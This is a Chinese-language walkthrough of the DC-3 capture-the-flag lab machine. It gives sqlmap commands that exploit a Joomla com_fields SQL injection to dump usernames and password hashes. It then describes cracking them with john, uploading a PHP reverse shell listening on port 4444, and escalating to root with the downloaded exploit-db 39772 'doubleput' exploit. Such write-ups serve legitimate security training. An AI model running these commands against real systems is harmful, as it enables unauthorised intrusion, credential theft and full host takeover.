1 获取ip
开机前一直按shift或Esc键
ro recovery nomodeset改为quiet splash rw init=/bin/bash
更改后按F10
重启虚拟机
2 端口扫描
3 服务确认
4 网站目录扫描
5 查看页面
joomscan扫描
joomscan --url http://192.168.182.139 -ec
查看版本漏洞
查看文档
6 SQL注入
数据库名
sqlmap -u “http://192.168.182.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
表名
sqlmap -u “http://192.168.182.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]
字段名
sqlmap -u “http://192.168.182.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent -D joomladb -T ‘#__users’ --columns -p list[fullordering]
用户名、密码
sqlmap -u “http://192.168.182.139/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml” --risk=3 --level=5 --random-agent -D joomladb -T ‘#__users’ -C ‘name,password’ --dump -p list[fullordering]
john解密
7 登录查找上传点
新建文件rsj.php
访问http://192.168.182.139/templates/beez3/rsj.php,监听4444端口
8 提权
查看版本漏洞
查看文件
cat /usr/share/exploitdb/exploits/linux/local/39772.txt
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
下载解压 unzip 39772.zip,exploit.tar放在/var/www/html目录下
开启apache2
/etc/init.d/apache2 start
tar -xvf exploit.tar
先执行compile.sh,生成doubleput
执行doubleput
DC-3靶机渗透
最新推荐文章于 2024-08-02 14:25:04 发布